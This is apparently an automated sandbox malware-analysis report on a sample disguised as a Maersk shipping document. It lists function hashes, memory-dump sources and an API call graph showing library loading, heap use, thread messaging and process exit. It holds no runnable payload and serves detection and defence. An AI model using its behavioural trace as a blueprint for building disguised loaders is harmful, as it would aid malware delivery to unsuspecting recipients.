                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 362b5cafe900216bc73027d25321b04aef8282282b68ede7bc3f54839e33f393
                                                    • Instruction ID: ca3fc8b3002b970217fc688cf08733e0d8b00a0c732004bfeada81ec20c54a77
                                                    • Opcode Fuzzy Hash: 362b5cafe900216bc73027d25321b04aef8282282b68ede7bc3f54839e33f393
                                                    • Instruction Fuzzy Hash: 23E115B4E002599FCB14DFA9C5809AEBBF2FF89305F288169D414AB355CB74AD41CFA1
                                                    Function 07FA5578 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b32186850ef4bd39ef2cdc77ab5eea19d215145b353ffde4c9b2d2812e498ec
                                                    • Instruction ID: 0b1972171e4ade402755c84c8e9b9b6ee86f3bdd8a2f4dc04630925ef3460582
                                                    • Opcode Fuzzy Hash: 8b32186850ef4bd39ef2cdc77ab5eea19d215145b353ffde4c9b2d2812e498ec
                                                    • Instruction Fuzzy Hash: 26E1D4B4E102199FCB14DFA9C5809AEBBF2FF89305F288169D414AB355DB34AD41CFA1
                                                    Function 07FA38C8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab213dd5cc19abe5857a0170192eeb275a128a500e62f66c858e27923aab8096
                                                    • Instruction ID: b7df04fb44295aa49075288db22b0df21c008807df181e1f988ec91ef99600ec
                                                    • Opcode Fuzzy Hash: ab213dd5cc19abe5857a0170192eeb275a128a500e62f66c858e27923aab8096
                                                    • Instruction Fuzzy Hash: 0DE1E5B4E002199FCB14DFA9C9809AEBBF2FF89305F288169D414AB355D734A941CFA1
                                                    Function 07FA3490 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea7dd578e80817d553b0731dbff7d7cca0339060938bbcffd6a6698ca0fbe5af
                                                    • Instruction ID: d096ea084bf52c2b8f1b76bd199ec80e9977563244f36bd4431ae17bfe88bc2c
                                                    • Opcode Fuzzy Hash: ea7dd578e80817d553b0731dbff7d7cca0339060938bbcffd6a6698ca0fbe5af
                                                    • Instruction Fuzzy Hash: 24E1F3B4E102199FCB14DFA9C5809AEBBF2FF89305F288169D414AB355DB34AD42CF61
                                                    Function 084A6BA1 Relevance: .3, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 45532fef5796af2fb043625300b3033a9db388744d779d412bacd5a18919789a
                                                    • Instruction ID: c94eb6771a3263753dbf03c832965e600942efc487222f0aff820943f80ba966
                                                    • Opcode Fuzzy Hash: 45532fef5796af2fb043625300b3033a9db388744d779d412bacd5a18919789a
                                                    • Instruction Fuzzy Hash: DED1FA31C2075A8ACB10EB64D9517ADB7B5FF96300F50979AE04937224FB706AC9CF91
                                                    Function 031BE124 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a74667ed9bfe9c7dff967e6618a8da84eff866226abeb3ab76da62ee62838e92
                                                    • Instruction ID: 31d335996b3c541a9164c6eaf8d0dc5079d4634a052c61342c65a4a3dca50633
                                                    • Opcode Fuzzy Hash: a74667ed9bfe9c7dff967e6618a8da84eff866226abeb3ab76da62ee62838e92
                                                    • Instruction Fuzzy Hash: C5A15036E003058FCF09DFB5D8445DEB7B2FF89300B2585AAE806AB265DB31D956CB50
                                                    Function 084A6BB0 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c68c9e2a184450a9a95e62f922e8146f2e651adfd526b02f44b3f2a3f52d9511
                                                    • Instruction ID: ae9aa5992b802a26a06534b57169ca00e2987590ad70a1847e255c0586121328
                                                    • Opcode Fuzzy Hash: c68c9e2a184450a9a95e62f922e8146f2e651adfd526b02f44b3f2a3f52d9511
                                                    • Instruction Fuzzy Hash: 06D1EA35C2075A8ACB10EB64D9516ADB7B5FF96300F50D79AE04937224FB706AC9CF81
                                                    Function 07FA4BB9 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13a455053e84d1da02524ccaa8735a23935b1f63bd23956ea0dbaeab04d6352a
                                                    • Instruction ID: df1393533e9cec060e7da8391e574e7754aa638d74c80ae5bd4e65fdb3db14ef
                                                    • Opcode Fuzzy Hash: 13a455053e84d1da02524ccaa8735a23935b1f63bd23956ea0dbaeab04d6352a
                                                    • Instruction Fuzzy Hash: 835129B4E102199BCB18DFA9C5809AEFBF6FF89304F24C169D418A7355DB349942CFA1
                                                    Function 07FA5567 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c361dbee0c2754509df7225065f7d3f18588e143e4c0cdaeff701d9d9aee3e8
                                                    • Instruction ID: 14af6d3046926d42712a7620cc6851ec317d4d8de3e1c0f74bde9979ade54bc0
                                                    • Opcode Fuzzy Hash: 9c361dbee0c2754509df7225065f7d3f18588e143e4c0cdaeff701d9d9aee3e8
                                                    • Instruction Fuzzy Hash: E551F8B4E102199BCB18DFA9C5805AEFBF6FF89304F24C169D418AB355DB349A41CFA1

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                    Signature Coverage:8%
                                                    Total number of Nodes:137
                                                    Total number of Limit Nodes:11
                                                    execution_graph 96600 42fa63 96601 42fa73 96600->96601 96602 42fa79 96600->96602 96605 42eaa3 96602->96605 96604 42fa9f 96608 42cc63 96605->96608 96607 42eabb 96607->96604 96609 42cc7d 96608->96609 96610 42cc8b RtlAllocateHeap 96609->96610 96610->96607 96611 4250a3 96616 4250bc 96611->96616 96612 425149 96613 425104 96619 42e9c3 96613->96619 96616->96612 96616->96613 96617 425144 96616->96617 96618 42e9c3 RtlFreeHeap 96617->96618 96618->96612 96622 42cca3 96619->96622 96621 425114 96623 42ccbd 96622->96623 96624 42cccb RtlFreeHeap 96623->96624 96624->96621 96712 424d13 96713 424d2f 96712->96713 96714 424d57 96713->96714 96715 424d6b 96713->96715 96716 42c953 NtClose 96714->96716 96717 42c953 NtClose 96715->96717 96718 424d60 96716->96718 96719 424d74 96717->96719 96722 42eae3 RtlAllocateHeap 96719->96722 96721 424d7f 96722->96721 96723 42bfb3 96724 42bfcd 96723->96724 96727 17e2df0 LdrInitializeThunk 96724->96727 96725 42bff2 96727->96725 96728 41b653 96729 41b697 96728->96729 96730 41b6b8 96729->96730 96731 42c953 NtClose 96729->96731 96731->96730 96732 41a8f3 96733 41a90b 96732->96733 96735 41a962 96732->96735 96733->96735 96736 41e833 96733->96736 96737 41e859 96736->96737 96741 41e94d 96737->96741 96742 42fb93 96737->96742 96739 41e8eb 96740 42c003 LdrInitializeThunk 96739->96740 96739->96741 96740->96741 96741->96735 96743 42fb03 96742->96743 96744 42fb60 96743->96744 96745 42eaa3 RtlAllocateHeap 96743->96745 96744->96739 96746 42fb3d 96745->96746 96747 42e9c3 RtlFreeHeap 96746->96747 96747->96744 96748 4143b3 96749 4143cd 96748->96749 96754 417b63 96749->96754 96751 4143e8 96752 41442d 96751->96752 96753 41441c PostThreadMessageW 96751->96753 96753->96752 96755 417b87 96754->96755 96756 417b8e 96755->96756 96757 417bca LdrLoadDll 96755->96757 96756->96751 96757->96756 96758 4190f8 96759 42c953 NtClose 96758->96759 96760 419102 96759->96760 96625 40192a 96627 40192e 96625->96627 96626 40198b 96627->96626 96630 42ff33 96627->96630 96633 42e573 96630->96633 96634 42e599 96633->96634 96645 407403 96634->96645 96636 42e5af 96644 401a50 96636->96644 96648 41b463 96636->96648 96638 42e5ce 96641 42e5e3 96638->96641 96663 42cce3 96638->96663 96659 428563 96641->96659 96642 42e5fd 96643 42cce3 ExitProcess 96642->96643 96643->96644 96666 416823 96645->96666 96647 407410 96647->96636 96649 41b48f 96648->96649 96684 41b353 96649->96684 96652 41b4d4 96655 41b4f0 96652->96655 96657 42c953 NtClose 96652->96657 96653 41b4bc 96654 41b4c7 96653->96654 96690 42c953 96653->96690 96654->96638 96655->96638 96658 41b4e6 96657->96658 96658->96638 96660 4285c5 96659->96660 96662 4285d2 96660->96662 96698 4189c3 96660->96698 96662->96642 96664 42cd00 96663->96664 96665 42cd11 ExitProcess 96664->96665 96665->96641 96667 416840 96666->96667 96669 416853 96667->96669 96670 42d393 96667->96670 96669->96647 96672 42d3ad 96670->96672 96671 42d3dc 96671->96669 96672->96671 96677 42c003 96672->96677 96675 42e9c3 RtlFreeHeap 96676 42d452 96675->96676 96676->96669 96678 42c01d 96677->96678 96681 17e2c0a 96678->96681 96679 42c046 96679->96675 96682 17e2c1f LdrInitializeThunk 96681->96682 96683 17e2c11 96681->96683 96682->96679 96683->96679 96685 41b36d 96684->96685 96689 41b449 96684->96689 96693 42c093 96685->96693 96688 42c953 NtClose 96688->96689 96689->96652 96689->96653 96691 42c96d 96690->96691 96692 42c97b NtClose 96691->96692 96692->96654 96694 42c0b0 96693->96694 96697 17e35c0 LdrInitializeThunk 96694->96697 96695 41b43d 96695->96688 96697->96695 96700 4189ed 96698->96700 96699 418edb 96699->96662 96700->96699 96706 414033 96700->96706 96702 418b0e 96702->96699 96703 42e9c3 RtlFreeHeap 96702->96703 96704 418b26 96703->96704 96704->96699 96705 42cce3 ExitProcess 96704->96705 96705->96699 96710 414050 96706->96710 96708 4140ac 96708->96702 96709 4140b6 96709->96702 96710->96709 96711 41b773 RtlFreeHeap LdrInitializeThunk 96710->96711 96711->96708 96761 413ebc 96762 413ed0 96761->96762 96763 413e64 96761->96763 96766 42cbd3 96763->96766 96767 42cbed 96766->96767 96770 17e2c70 LdrInitializeThunk 96767->96770 96768 413e75 96770->96768 96771 17e2b60 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                    Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                    • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                    • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                    • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                    Function 017E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                    • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                    • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                    • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                    Function 017E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                    • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                    • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                    • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                    Function 017E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                    • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                    • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                    • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                    Function 017E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                    • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                    • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                    • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3
                                                    Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                    • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                    • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                    • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                    Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                    • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                    • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                    • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                    Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                    • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                    • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                    • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                    Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 337 417c68-417c70 335->337 337->339 340 417c72-417c74 337->340 339->335 341 417c3a-417c3b 339->341 340->337 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 348 417bda-417bdd 343->348 344->335 347 417c99-417cae 345->347 349 417cc0-417cc1 346->349 350 417c84 346->350 352 417cb0 347->352 353 417d17-417d2b call 42b9b3 347->353 350->347 351 417c87 350->351 351->345 354 417cb2-417cbe 352->354 355 417d2e-417d3f 352->355 353->355 354->349
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                    • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                    • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                    • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                    Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 364 417c72-417c74 360->364 365 417c2e-417c38 360->365 362 417be5-417bf3 361->362 363 417c2a 361->363 362->358 370 417bb8-417bc1 363->370 371 417c2c-417c38 363->371 368 417c76-417c7a 364->368 369 417c68-417c6e 364->369 366 417c55-417c67 365->366 367 417c3a-417c3b 365->367 366->369 374 417bca-417bd7 LdrLoadDll 367->374 375 417c3d 367->375 376 417c8c-417c98 368->376 377 417c7c-417c82 368->377 369->360 372 417bc3-417bc9 370->372 373 417bda-417bdd 370->373 371->366 371->367 372->374 374->373 375->366 378 417c99-417cae 376->378 379 417cc0-417cc1 377->379 380 417c84 377->380 382 417cb0 378->382 383 417d17-417d2b call 42b9b3 378->383 380->378 381 417c87 380->381 381->376 384 417cb2-417cbe 382->384 385 417d2e-417d3f 382->385 383->385 384->379
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                    • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                    • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                    • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                    Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                    • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                    • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                    • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                    Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                    • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                    • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
